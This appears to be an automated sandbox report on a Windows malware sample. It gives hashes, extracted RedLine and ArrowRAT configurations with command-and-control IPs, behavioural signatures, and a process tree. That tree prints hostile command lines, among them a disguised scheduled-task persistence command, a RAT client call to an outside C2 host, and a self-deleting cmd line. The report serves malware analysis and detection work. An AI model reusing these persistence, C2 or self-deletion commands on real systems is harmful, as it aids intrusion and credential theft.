Analysis

max time kernel: 82s
max time network: 153s
platform: windows10-2004_x64
resource: win10v2004-20220901-en
resource tags: arch:x64, arch:x86, image:win10v2004-20220901-en, locale:en-us, os:windows10-2004-x64, system
submitted: 11/11/2022, 18:30

Static task: static1
Behavioral task: behavioral1
  Sample: 6c90b6acb49fff4969b5f5fabde4b4fea363e1902ac675ba02e7ad325804b7d4.exe
  Resource: win10v2004-20220901-en
General

Target: 6c90b6acb49fff4969b5f5fabde4b4fea363e1902ac675ba02e7ad325804b7d4.exe
Size: 18.4MB
MD5: 464502cbaae7b9ed1cd6da844d38ba86
SHA1: 30dd42539cbfad04564f9db45ca40f2b9e81546c
SHA256: 6c90b6acb49fff4969b5f5fabde4b4fea363e1902ac675ba02e7ad325804b7d4
SHA512: e74b45702eeaca95bc6c9f2aeea8a5958a425dc1f45ecfb127e286a39eb668243b41e56c705ae5fe7a72ff1ab691948adf29ddd6de18509421fa415647a36b59
SSDEEP: 98304:2pgc9WBd2/ojIbrK51bnqvMwqwWhWznbdyxDDFC4B14d+iXLfg0rf2a33OXA7zTg:2pgnBkbYEMUWIzbdyxDDFCXpZU
Malware Config

Extracted: arrowrat
  Client
  213.239.219.58:1337
  nPxRArUjc

Extracted: redline
  @NoxyCloud
  85.192.63.57:34210
  auth_value: 20dc074852db65a2b74addf964cf576e
Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.

RedLine payload (1 IoC)
  resource | yara_rule
  behavioral1/memory/4444-245-0x0000000000400000-0x0000000000428000-memory.dmp | family_redline

Suspicious use of NtCreateUserProcessOtherParentProcess (1 IoC)
  description | pid | Process | procid_target
  PID 4384 created 2476 | 4384 | Quoko tace wesa.exe | 60

Downloads MZ/PE file

Executes dropped EXE (2 IoCs)
  pid | Process
  4304 | MRH.exe
  4384 | Quoko tace wesa.exe

Modifies Installed Components in the registry (2 TTPs, 1 IoC)
  description | ioc | Process
  Key created | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Active Setup\Installed Components | explorer.exe

Checks computer location settings (2 TTPs, 1 IoC)
Looks up country code configured in the registry, likely geofence.
  description | ioc | Process
  Key value queried | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation | MRH.exe

Loads dropped DLL (1 IoC)
  pid | Process
  4384 | Quoko tace wesa.exe

Enumerates connected drives (3 TTPs, 1 IoC)
Attempts to read the root path of hard drives other than the default C: drive.
  description | ioc | Process
  File opened (read-only) | \??\D: | explorer.exe

Suspicious use of SetThreadContext (3 IoCs)
  description | pid | Process | procid_target
  PID 2564 set thread context of 992 | 2564 | 6c90b6acb49fff4969b5f5fabde4b4fea363e1902ac675ba02e7ad325804b7d4.exe | 81
  PID 4384 set thread context of 4484 | 4384 | Quoko tace wesa.exe | 110
  PID 4484 set thread context of 2900 | 4484 | InstallUtil.exe | 112

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Checks processor information in registry (2 TTPs, 2 IoCs)
Processor information is often read in order to detect sandboxing environments.
  description | ioc | Process
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | AcroRd32.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | AcroRd32.exe

Creates scheduled task(s) (1 TTP, 1 IoC)
Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid | Process
  2948 | schtasks.exe
Modifies Internet Explorer settings (1 IoC)
  description | ioc | Process
  Key created | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION | AcroRd32.exe
Modifies registry class (10 IoCs)
  description | ioc | Process
  Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-929662420-1054238289-2961194603-1000\{26460135-AA43-4D36-BE5E-18246578A6E5} | explorer.exe
  Key created | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | explorer.exe
  Set value (data) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | explorer.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | explorer.exe
  Key created | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings | InstallUtil.exe
  Key created | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings | explorer.exe
  Key created | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | explorer.exe
  Set value (data) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | explorer.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | explorer.exe
  Key created | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | explorer.exe

Runs ping.exe (1 TTP, 1 IoC)
  pid | Process
  2768 | PING.EXE

Suspicious behavior: EnumeratesProcesses (44 IoCs)
  pid | Process
  1508 | AcroRd32.exe (20 entries)
  4304 | MRH.exe (10 entries)
  4384 | Quoko tace wesa.exe (12 entries)
  4484 | InstallUtil.exe (2 entries)

Suspicious use of AdjustPrivilegeToken (11 IoCs)
  description | pid | Process
  Token: SeDebugPrivilege | 4484 | InstallUtil.exe
  Token: SeShutdownPrivilege | 2300 | explorer.exe (5 entries)
  Token: SeCreatePagefilePrivilege | 2300 | explorer.exe (5 entries)

Suspicious use of FindShellTrayWindow (7 IoCs)
  pid | Process
  1508 | AcroRd32.exe
  2300 | explorer.exe (6 entries)

Suspicious use of SendNotifyMessage (8 IoCs)
  pid | Process
  2300 | explorer.exe (8 entries)

Suspicious use of SetWindowsHookEx (9 IoCs)
  pid | Process
  992 | InstallUtil.exe
  1508 | AcroRd32.exe (6 entries)
  4484 | InstallUtil.exe
  1812 | StartMenuExperienceHost.exe

Suspicious use of WriteProcessMemory (64 IoCs)
  description | pid | Process | procid_target
  PID 2564 wrote to memory of 992 | 2564 | 6c90b6acb49fff4969b5f5fabde4b4fea363e1902ac675ba02e7ad325804b7d4.exe | 81 (7 entries)
  PID 992 wrote to memory of 1508 | 992 | InstallUtil.exe | 82 (3 entries)
  PID 1508 wrote to memory of 952 | 1508 | AcroRd32.exe | 87 (3 entries)
  PID 952 wrote to memory of 380 | 952 | RdrCEF.exe | 90 (41 entries)
  PID 952 wrote to memory of 4264 | 952 | RdrCEF.exe | 89 (10 entries)
Processes
(indentation shows the parent/child depth of the process tree)

C:\Windows\system32\taskhostw.exe (PID 2476)
  command line: taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}

C:\Users\Admin\AppData\Local\Temp\6c90b6acb49fff4969b5f5fabde4b4fea363e1902ac675ba02e7ad325804b7d4.exe (PID 2564)
  command line: "C:\Users\Admin\AppData\Local\Temp\6c90b6acb49fff4969b5f5fabde4b4fea363e1902ac675ba02e7ad325804b7d4.exe"
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory

  C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe (PID 992)
    command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
    - Modifies registry class
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory

    C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe (PID 1508)
      command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\Invoice.pdf"
      - Checks processor information in registry
      - Modifies Internet Explorer settings
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of FindShellTrayWindow
      - Suspicious use of SetWindowsHookEx
      - Suspicious use of WriteProcessMemory

      C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe (PID 952)
        command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
        - Suspicious use of WriteProcessMemory

        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe (PID 4264)
          command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=9B1B4361A50C21DF25A7FABE68305572 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=9B1B4361A50C21DF25A7FABE68305572 --renderer-client-id=2 --mojo-platform-channel-handle=1756 --allow-no-sandbox-job /prefetch:1

        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe (PID 380)
          command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=788D1D1BBE16AB2A137559086BD50A0F --mojo-platform-channel-handle=1744 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe (PID 4580)
          command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=281E355ACFE8D4C1AF03FB24F6C059C1 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=281E355ACFE8D4C1AF03FB24F6C059C1 --renderer-client-id=4 --mojo-platform-channel-handle=2324 --allow-no-sandbox-job /prefetch:1

        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe (PID 4948)
          command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=0A78EE24E75F23A17C9BBAE7AAD8B941 --mojo-platform-channel-handle=2568 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe (PID 3708)
          command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=5CF4FE0910D7224F29E8FA99DB67877F --mojo-platform-channel-handle=2800 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe (PID 1564)
          command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=7A8D0A0C7A05632F707DD1AC5504DB59 --mojo-platform-channel-handle=2772 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

    C:\Users\Admin\AppData\Local\Temp\MRH.exe (PID 4304)
      command line: "C:\Users\Admin\AppData\Local\Temp\MRH.exe" 0
      - Executes dropped EXE
      - Checks computer location settings
      - Suspicious behavior: EnumeratesProcesses

      C:\Windows\SysWOW64\schtasks.exe (PID 2948)
        command line: "C:\Windows\system32\schtasks.exe" /create /tn COMSurrogate /f /sc onlogon /rl highest /tr "C:\Users\Admin\Yisike quoquola fika quaveb\Quoko tace wesa.exe"
        - Creates scheduled task(s)

      C:\Users\Admin\Yisike quoquola fika quaveb\Quoko tace wesa.exe (PID 4384)
        command line: "C:\Users\Admin\Yisike quoquola fika quaveb\Quoko tace wesa.exe" 0
        - Suspicious use of NtCreateUserProcessOtherParentProcess
        - Executes dropped EXE
        - Loads dropped DLL
        - Suspicious use of SetThreadContext
        - Suspicious behavior: EnumeratesProcesses

        C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe (PID 4588)
          command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"

        C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe (PID 4908)
          command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"

        C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe (PID 4056)
          command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"

        C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe (PID 4484)
          command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
          - Suspicious use of SetThreadContext
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of SetWindowsHookEx

          C:\Windows\explorer.exe (PID 2300)
            command line: "C:\Windows\explorer.exe"
            - Modifies Installed Components in the registry
            - Enumerates connected drives
            - Modifies registry class
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of FindShellTrayWindow
            - Suspicious use of SendNotifyMessage

          C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe (PID 2900)
            command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 213.239.219.58 1337 nPxRArUjc

      C:\Windows\SysWOW64\cmd.exe (PID 3692)
        command line: "C:\Windows\System32\cmd.exe" /c chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\MRH.exe"

        C:\Windows\SysWOW64\chcp.com (PID 3392)
          command line: chcp 65001

        C:\Windows\SysWOW64\PING.EXE (PID 2768)
          command line: ping 127.0.0.1
          - Runs ping.exe

    C:\Users\Admin\AppData\Local\Temp\ROR.exe (PID 3084)
      command line: "C:\Users\Admin\AppData\Local\Temp\ROR.exe" 0

      C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe (PID 1896)
        command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"

      C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe (PID 4444)
        command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"

C:\Windows\System32\CompPkgSrv.exe (PID 5104)
  command line: C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe (PID 1812)
  command line: "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
  - Suspicious use of SetWindowsHookEx

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe (PID 344)
  command line: "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
Downloads

Filesize: 717B
MD5: ec8ff3b1ded0246437b1472c69dd1811
SHA1: d813e874c2524e3a7da6c466c67854ad16800326
SHA256: e634c2d1ed20e0638c95597adf4c9d392ebab932d3353f18af1e4421f4bb9cab
SHA512: e967b804cbf2d6da30a532cbc62557d09bd236807790040c6bee5584a482dc09d724fc1d9ac0de6aa5b4e8b1fff72c8ab3206222cc2c95a91035754ac1257552

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
Filesize: 192B
MD5: 3ec90b352d8840c7a9ac3d1c6069e966
SHA1: b13c9af8657c7d832eefdb2317397c445234e420
SHA256: 9eecbc2c89740bdc0497ebcc0350e58de39a7c392c7eda811b55736ae79ce552
SHA512: 53cf4274430f423e6628c20d28ae2b1c52c344afb6458560d2d60897bda54c766859a0a4d7ca4d491cbc44dca63f8d25d5ba43fed765c1bbaacf2548e46e3087

Filesize: 259KB
MD5: 94aafe6b249b7f529f9d66a6f7d0b80e
SHA1: a83eee4aa9c936a8e423c4b2b7d2b1036a9a0c44
SHA256: 41c631caa7c9e95166917bec39627c488400d180622e4b2bb3a3629732692b54
SHA512: e94befd6c2462bbab13e0e66569c78d34d075f15a9923713f9e72bbd7f791103ef20161b7f830a9ad1f2745ccd9e60bbbe7540f87c025d3be4b0dba3d546d5cb

Filesize: 163KB
MD5: 5441d36f8dcfdd31e75562b380bea7a8
SHA1: 70053ce7491743efacaa4b40f452efb3f32df4e8
SHA256: 58098a6f25d3fb423b49a97cf917a406c5841d7ac792ef04ecb9646f5629baf3
SHA512: 06a19ace54e2ccb25faaba3dce7a4b72010d1002efbd5d3e1cab1f23493dd8ada55803e9cd695a79c6030204224a84c5192b334b2e8c1007713e1f472f645bbe

Filesize: 1.9MB
MD5: 18585735c8866b21e2723a6f020bafd0
SHA1: afb5b2c9d5ca57501835b0c56fd97b0641f01d88
SHA256: e9c817d02acaf2fbb59a0a44be05dbb284ee622f50b2e2a598daac8bfb564672
SHA512: 88516af4bbbd9562a9ae9840124c6f9f1402f9a15a0ace5e2413023bbd80c37aa441cc39b8b48f8ca58f4192273e16cd590cd2e9e9a4298f6ed5b0497d54e6b8

Filesize: 1.9MB
MD5: 18585735c8866b21e2723a6f020bafd0
SHA1: afb5b2c9d5ca57501835b0c56fd97b0641f01d88
SHA256: e9c817d02acaf2fbb59a0a44be05dbb284ee622f50b2e2a598daac8bfb564672
SHA512: 88516af4bbbd9562a9ae9840124c6f9f1402f9a15a0ace5e2413023bbd80c37aa441cc39b8b48f8ca58f4192273e16cd590cd2e9e9a4298f6ed5b0497d54e6b8

Filesize: 1.7MB
MD5: 63943e27f96fafc738cb258a0d1dccfd
SHA1: 06f0fb47b766f83446319ab267bd745ee42a2920
SHA256: 2ba396d144c8802258b863f2bd2ac47918e887f2727e24b6bc92778f83a72c57
SHA512: 4916ece9c0beade5b6d697dcca5a3f4b1047c607be228bef3cbeb3215f05dba221371f770e3641d8799733d87990f0a17c61eb1acbc5393e2f11facf9d4fb68d

Filesize: 1.7MB
MD5: 63943e27f96fafc738cb258a0d1dccfd
SHA1: 06f0fb47b766f83446319ab267bd745ee42a2920
SHA256: 2ba396d144c8802258b863f2bd2ac47918e887f2727e24b6bc92778f83a72c57
SHA512: 4916ece9c0beade5b6d697dcca5a3f4b1047c607be228bef3cbeb3215f05dba221371f770e3641d8799733d87990f0a17c61eb1acbc5393e2f11facf9d4fb68d

Filesize: 262KB
MD5: 1b51fec95f5403305749c4bcb3485b14
SHA1: f4974196213a94911c850504924f38cd9e7fe889
SHA256: 3c0d3f9a776c503eca4e0a014006fe1a8f53e5e22138f6add9e45ad0fbf8844e
SHA512: 6e8aa862cb2d95fe67c212de2ee59f903a3de6e16bdd87918e31bc2d7de9a1bdd61f756f1bdf35aa41c7e3620650b9ad9bbaa65487d7152fdf7420767a91e90d

Filesize: 262KB
MD5: 1b51fec95f5403305749c4bcb3485b14
SHA1: f4974196213a94911c850504924f38cd9e7fe889
SHA256: 3c0d3f9a776c503eca4e0a014006fe1a8f53e5e22138f6add9e45ad0fbf8844e
SHA512: 6e8aa862cb2d95fe67c212de2ee59f903a3de6e16bdd87918e31bc2d7de9a1bdd61f756f1bdf35aa41c7e3620650b9ad9bbaa65487d7152fdf7420767a91e90d

Filesize: 262KB
MD5: 1b51fec95f5403305749c4bcb3485b14
SHA1: f4974196213a94911c850504924f38cd9e7fe889
SHA256: 3c0d3f9a776c503eca4e0a014006fe1a8f53e5e22138f6add9e45ad0fbf8844e
SHA512: 6e8aa862cb2d95fe67c212de2ee59f903a3de6e16bdd87918e31bc2d7de9a1bdd61f756f1bdf35aa41c7e3620650b9ad9bbaa65487d7152fdf7420767a91e90d

Filesize: 407.8MB
MD5: 9036c9d610b1732bbf6595672f7b394c
SHA1: 063aa3148edb751576cbfd0644e300b5c6122a48
SHA256: d12ecb5b5135213fe9455e370e060b06de778c17fdad73450eaf251979569992
SHA512: 2800e767dfdbe4b5feb5f3a3c19373bc83a304070b4b8a2165dc1295dcd367ac2c3c2ce2a26f40987a673a2269c02ae6a76f48091e08322a2e9a887087a3b657

Filesize: 411.6MB
MD5: 0f78afa333ba8572cc2ceee98d78ca3c
SHA1: bebd6360e79dc1cd16a85d3955dce7d39d24d881
SHA256: e4ca9fa322ccd11416ee671b3a5de1e4b67e961d506f053defff91ab287f2b97
SHA512: c4260498a7b9726a93abc5372eb6608cf5e8a1fde34ffff0c4d61644a05527a4966d182b101aecb6a39bca9587ce40e0ae242ed65479fc1f9469fbc30edfa263